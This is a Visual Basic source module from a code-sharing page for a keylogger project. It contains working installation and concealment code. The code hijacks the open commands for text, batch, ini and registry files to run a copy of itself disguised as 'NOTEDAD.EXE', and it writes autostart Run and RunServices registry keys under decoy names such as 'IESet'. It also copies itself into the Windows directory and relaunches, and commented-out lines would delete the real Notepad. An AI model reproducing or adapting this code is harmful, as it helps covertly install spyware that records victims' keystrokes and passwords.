module3.bas
来自「捕获键盘操作的记录」· BAS 代码 · 共 93 行
BAS
93 行
Attribute VB_Name = "Module2"
Option Explicit
Public AppPath As String
Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public syspath2 As String
Private Declare Function GetTickCount Lib "kernel32" () As Long
Sub pause(howlong As Long)
Dim u%, tick As Long
tick = GetTickCount()
Do
u% = DoEvents
Loop Until tick + howlong < GetTickCount
End Sub
Public Function syspath() As String '得到system路径
On Error Resume Next
Dim len5 As Long
syspath = String(255, 0)
len5 = GetSystemDirectory(syspath, 256)
syspath = Left(syspath, InStr(1, syspath, Chr(0)) - 1)
syspath2 = Left(syspath, InStrRev(syspath, "\") - 1)
End Function
Public Sub hideme()
On Error Resume Next
Dim RegEdit As Object, i As Integer
Set RegEdit = CreateObject("WScript.Shell")
RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\batfile\shell\edit\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\inifile\shell\open\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\regfile\shell\edit\command\", "NOTEDAD.EXE %1"
RegEdit.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IESet", "IExplorer.dll .dbt"
RegEdit.regwrite "HKEY_CLASSES_ROOT\.dbt\", "DBTFILE"
RegEdit.regwrite "HKEY_CLASSES_ROOT\DBTFILE\shell\open\command\", "NOTEDAD.EXE"
Open syspath & "\IExplorer.dll .dbt" For Append As #1
Close #1
' If Not LCase(Dir(syspath & "\WBEM\Logs\qfsl.exe")) = "qfsl.exe" Then
' If Not UCase(Dir(syspath2 & "\NOTEPAD_BACKUP.EXE")) = "NOTEPAD_BACKUP.EXE" Then
'' If Dir(syspath & "\NOTEPAD.EXE") <> "" Then FileCopy syspath & "\NOTEPAD.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' If Dir(syspath2 & "\NOTEPAD.EXE") <> "" Then FileCopy syspath2 & "\NOTEPAD.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' Else
' FileCopy syspath2 & "\NOTEPAD_BACKUP.EXE", syspath & "\WBEM\Logs\qfsl.exe"
' End If
' End If
' Kill syspath & "\NOTEPAD.EXE" 'system目录下或是system32下
' Kill syspath2 & "\NOTEPAD.EXE" 'winnt目录下或是WINDOWS下
FileCopy AppPath & "\QFSLKeylog.ini", syspath2 & "\QFSLKeylog.ini"
FileCopy AppPath & "\" & App.EXEName & ".exe", syspath2 & "\NOTEDAD.EXE"
' FileCopy AppPath & "\" & App.EXEName & ".exe", syspath & "\WBEM\Logs\backup.exe"
For i = 1 To 100
If Dir(syspath2 & "\QFSLKeylog.ini") <> "" Then Exit For
pause (50)
Next
pause (50)
If AppPath <> syspath2 Then Shell syspath2 & "\NOTEDAD.EXE", vbNormalFocus: End
End Sub
Public Sub uninstall()
On Error Resume Next
Dim RegEdit As Object
Set RegEdit = CreateObject("WScript.Shell")
Kill syspath2 & "\QFSLKeylog.ini"
Kill syspath2 & "\NOTEDAD.EXE"
' Kill syspath & "\WBEM\Logs\backup.exe"
RegEdit.regwrite "HKEY_CLASSES_ROOT\txtfile\shell\open\command\", "NOTEPAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\batfile\shell\edit\command\", "NOTEPAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\inifile\shell\open\command\", "NOTEPAD.EXE %1"
RegEdit.regwrite "HKEY_CLASSES_ROOT\regfile\shell\edit\command\", "NOTEPAD.EXE %1"
RegEdit.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IESet"
RegEdit.regdelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\IESet"
RegEdit.regdelete "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\IESet"
RegEdit.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\IESet"
RegEdit.regdelete "HKEY_CLASSES_ROOT\.dbt\"
RegEdit.regdelete "HKEY_CLASSES_ROOT\DBTFILE\"
' FileCopy syspath & "\WBEM\Logs\qfsl.exe", syspath2 & "\NOTEPAD_BACKUP.EXE"
' Kill syspath & "\WBEM\Logs\qfsl.exe"
End Sub
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?